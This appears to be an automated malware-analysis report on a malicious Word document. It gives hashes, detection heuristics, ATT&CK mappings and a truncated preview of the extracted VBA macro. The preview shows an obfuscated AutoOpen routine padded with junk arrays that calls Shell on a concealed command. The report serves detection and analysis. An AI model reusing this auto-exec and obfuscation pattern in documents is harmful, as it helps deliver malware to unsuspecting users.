Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 67015b6b503b4514…

MALICIOUS

Office (OLE)

179.5 KB Created: 2017-12-07 13:01:00 Authoring application: Microsoft Office Word First seen: 2018-02-07
MD5: 34f31d352580fd0f7f0b279cd72004ce SHA-1: ccf96ae96fa742439ca342d76524e3ec2afc063a SHA-256: 67015b6b503b4514c4770957898747959cfaf122cd6e8805585aec0526e860fd
282 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The file contains a malicious VBA macro with an AutoOpen subroutine that calls the Shell function. This indicates the macro is designed to execute arbitrary commands, likely to download and run a second-stage payload. The presence of the `jAu+jAugjAu` URL is suspicious and may be related to the payload delivery. The ClamAV detection `Img.Dropper.PhishingLure-6443153-0` further supports its malicious nature.

Heuristics 8

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 183,808 bytes but its declared streams total only 103,988 bytes — 79,820 bytes (43%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://jAu+jAugjAu In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 34623 bytes
SHA-256: a2bcf12ef450eece1e6fa0455ed125cb60f925a18db241f25d3940ff88f6ab60
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "hmWNzfA"
Sub AutoOpen()
udJwaCbpSAHpKA = Array(UCase("oYUZFmoOQnUHVf" + "DWYZFHuQlfr" + "CkBMPRsupzdnKG" + "tKGuFKqzl" + "kvmuIjuNr"))
iObEpdllDtkP = Array(UCase("tBFikllLmQufVF" + "hQjaSVk" + "jCEcZFtshUz" + "sCFJcGZrwjYUXk" + "nJKwcJW"))
bjIMGsXNLY = Array(UCase("HiKazMws" + "CikFoAGiWXU" + "WjddTuSzaTNv" + "cacjMkjQ" + "TzvCXFmoqoDbl"))
hwdSdsFjRouMad = Array(UCase("KnnTjNfhRWMMlc" + "sjqcvmiRDX" + "kjGILfIpjAPH" + "jBOMwQj" + "GswKVwiMbV"))
vvdwbILhEwwX = Array(UCase("blsuXVVnrQd" + "JzqjadFffMJGC" + "EkibXKUUjjFno" + "AzDizKR" + "VBdSrszP"))
mrkRkEQtTUp = Array(UCase("GbmpzihIi" + "sVtPhwET" + "WTHSwDoQsnl" + "pbwOZqdrOPG" + "fzOYUXRpAtTuzI"))
VBA.Shell$ GroQSZEWTizL, 0
lLNpUtaCtwBIH = Array(UCase("bMHMJnwpPwV" + "vfwIBOQAsj" + "alDEzUb" + "PKOZjLhqV" + "wvRTzzvFlumrGi"))
LjbFizUndGKhGQ = Array(UCase("UYuGvlkGmGJrjh" + "XEfiUiGknuc" + "oNoQpooa" + "wznJbaozZ" + "kGwiGCbv"))
NoHMTdvsw = Array(UCase("TDvGSaEsVtERk" + "mrBrfhNNt" + "MZpnTffiqJ" + "EoziHCK" + "COvEtab"))
EMQcFJZuslR = Array(UCase("pOVbaHhCBM" + "fDHrHQVvMr" + "aVahzuP" + "mVllQns" + "dmsZbsolYz"))
SdXqEjmnz = Array(UCase("sImnwaC" + "RrDPvrJUScihoI" + "cwbPfhE" + "AsUkdFlfRmr" + "GPChfhjO"))
End Sub
Function XhjTwHsqFVhv()
FbAup = Array(UCase("VQILuJKvMcuuDQ" + "rKBLYsWFLjSDC" + "KvfMHQbm" + "rRzuSZBMjH" + "iFOaJGwKzbcGIn"), UCase("jOivzOE" + "JtawEjJXivGdE" + "EDBSQpuPLpGQ" + "nioIiZREjiIui" + "EtKCJwzJiuhzO"))
WuRFjiLSwS = Mid("NWXnEMczPmoDw   nlocFBAzlEHoLui", 14, 3)
NsvwkztJEv = Array(UCase("PFkYTDcpUipA" + "GIXAzwzKwzcW" + "ovSwOnBAHkjNoJ" + "IPLjkKHNRpHwz" + "SHICXOhWXP"), UCase("wjzYnnL" + "KChmsmljiBHHq" + "aocbLQu" + "lrvhlaIp" + "BwHmXlVQPlh"))
BsGWzsW = Array(UCase("uilrnnWtunXDnb" + "VtXmBqVAnz" + "tdztakLXKw" + "QGqRLzXiGJYlIB" + "KMDYhzuT"), UCase("stAMnsQRZYcRvk" + "WdJrKVsqsRZ" + "TlRwVnwYSwKqNt" + "LkYsPcY" + "DoDIYAC"))
YbRQddN = Array(UCase("RWVqAjLIQTtS" + "wMMjdcJOKaL" + "zbvEdTFuHZ" + "rNTTiSibj" + "VdCctmVYSGvKT"), UCase("IQDnAnX" + "YwVVJIavc" + "biiwtcjhkWpSUh" + "TLRPvawQCEGHYc" + "zWiwjkVJ"))
UPzZhC = Mid("PjALUntqtEqiXO", 10, 1)
vUpdTzp = Array(UCase("uNtwjIZH" + "wLMXSSdROjG" + "YKWuiNKRiY" + "PrPdUwaCKQ" + "QQMikVarK"), UCase("vnWCWBzvPp" + "anzjCpIVoivDKu" + "iEcormN" + "TDtawud" + "vbOpdPwh"))
CEcsXMvWAht = Array(UCase("bDTDBdFboa" + "zJjhYiScunUKE" + "YToYzKzCuo" + "HtOZwiTzlPoqw" + "ERtPkGsOfd"), UCase("RCqQsuOr" + "RlECvIBNTHjcr" + "tsEnKiw" + "NkPhcdhsUZwGG" + "NqTbFfvYu"))
fdTpmj = Array(UCase("tsHNZjlEz" + "WYmjjFpzohh" + "SUOOuGrc" + "KTDbQJSAQWkHh" + "YNHFXKMHiilZnw"), UCase("oiNWmMFj" + "TvXwYLzA" + "ZpBmBTSfCoUp" + "WTpbsWkuhTizl" + "mOiTlloNJJB"))
zHLKwaUPYww = Mid("sRaHHAoIz plDTKYvOfvTDwRHFrOZfBzz", 10, 1)
viNkbt = Array(UCase("ZBzXoHEJrYYT" + "OfYjamJiluZfO" + "icTzpqiHbf" + "ENVoOhuu" + "FwhzVlk"), UCase("nGXsZnV" + "YbicEGEsWVZo" + "XNilMOmvTcEGj" + "UIRfazHpGM" + "zzroczLwM"))
FOSSOkuXdd = Array(UCase("uEHJQOSdZEI" + "SaPqsWXnPrfQTV" + "DCIKjZPcfnYC" + "hIChFmAKV" + "VmlOMCYqpvfOaQ"), UCase("bXDwkDUUIGHpwL" + "UYhFnXuKCaGw" + "GjShmniOzMlt" + "RdIFNaf" + "bHjVcWhM"))
lJwYljD = Array(UCase("EdmHjVaJS" + "LZvDYfq" + "ZRjEOzkwEMt" + "DPzjcPH" + "fcdLpQGsYK"), UCase("AjUMDiz" + "nXjROPOww" + "MaJXTzznVPw" + "rXuLtUiDuAcAU" + "vLPwaRK"))
krKDK = Mid("TT  kmrNSRWazmZzNAOIRmkmimGwBJFcQVrrbh", 3, 2)
BszmWV = Array(UCase("XdGlNYn" + "CLhSWLwLlF" + "CzNjRaibl" + "JQwCzpIn" + "EEUfKPwpF"), UCase("kKrRQKDKzpLjzC" + "sukQZVnYV" + "MhRCQTl" + "iABSwjstfL" + "EUHSSSUOYjazmV"))
PYSGXV = Array(UCase("LjrcQXOPN" + "PufLWCWtPshL" + "IDTBmYZohibLKU" + "ELofmslaV" + "oNZhBRiAljZz"), UCase("crowiLDzMh" + "pEECYFW" + "wSzKzHfRsLY" + "rGpLnwwDORjb" + "TrzMjbjMvzD"))
XXPbCtwBA = Array(UCase("qiaGhSUEFTbs" + "kKqBRUn" + "VurjqZufi" + "AEdzjvw" + "PLYAYPSfz"), UCase("OJSznSUnjXqtZY" + "TaoblbvCzF" + "uVVbQLbzRZi" + "QLiwMbc" + "lzdFpiELTT"))
ZFIzh = Mid("XaiBYstNeHYjolZkDbRXiokOFzjwWjQNZcqpo", 9, 1)
IvXOfu = Array(UCase("jppCuLoowOi" + "tOaJTPhiV" + "jPiELksYvHm" + "HJHATFvnjEI" + "TRAWtjSUJBIZ"), UCase("qzDwXTacNH" + "CSvbmivbH" + "ltjVfOp" + "WFAhfdFsq" + "khFFKjUa"))
zTFDIT
... (truncated)